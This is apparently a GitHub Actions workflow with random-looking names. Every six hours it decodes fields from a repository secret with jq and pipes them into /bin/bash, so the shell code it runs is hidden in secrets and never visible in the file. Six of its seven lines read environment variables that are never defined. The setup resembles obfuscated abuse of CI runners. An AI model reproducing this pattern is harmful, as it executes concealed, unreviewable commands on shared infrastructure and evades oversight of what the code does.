name: danchaofancfcf

on:
  workflow_dispatch:
  schedule:
    - cron: '11 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: danchaofancfcf
        env:
          v50: ${{ secrets.v50 }}
        run: |
          echo $v50 | jq -r .fspf81 | /bin/bash
          echo $dfycl31 | jq -r .ags30 | /bin/bash
          echo $tr72 | jq -r .kk82 | /bin/bash
          echo $sgsg0 | jq -r .tuk94 | /bin/bash
          echo $uv5 | jq -r .cjffe72124 | /bin/bash
          echo $syj5 | jq -r .or754 | /bin/bash
          echo $ig743 | jq -r .nz2411 | /bin/bash

